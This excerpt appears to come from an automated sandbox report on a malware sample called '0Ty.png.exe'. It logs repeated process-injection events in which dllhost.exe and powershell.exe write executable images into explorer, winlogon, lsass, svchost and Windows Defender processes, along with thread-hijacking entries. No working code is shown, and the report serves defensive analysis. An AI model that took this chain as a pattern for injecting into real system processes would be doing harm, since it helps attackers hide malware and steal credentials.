            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2570000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2930000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D00000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2750000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 28B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 940000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2330000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: FF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2920000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2390000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2740000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: B50000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2550000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 7F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 9F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2600000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2500000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2820000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2510000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2220000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: AA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 880000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 690000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2840000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: C30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 910000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2310000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1500000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2900000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2130000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E50000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 8D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2360000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 20C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 15B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FE0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1480000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 14F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: F50000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2EF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 22F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 900000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 970000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 670000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2970000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2300000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 840000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2090000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2200000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6440000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1BFF06F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 24089940000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28B955D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 14ECB470000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 191C8F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 27F4ECC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 17B55CA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9700000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9730000 value starts with: 4D5A
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 3400000 value: 4D
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\0Ty.png.exeThread register set: target process: 8008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 8008Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeThread register set: target process: 7936Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeThread register set: target process: 8136Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeThread register set: target process: 8052Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3228
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 6F6794F010Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: C085B89010
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000
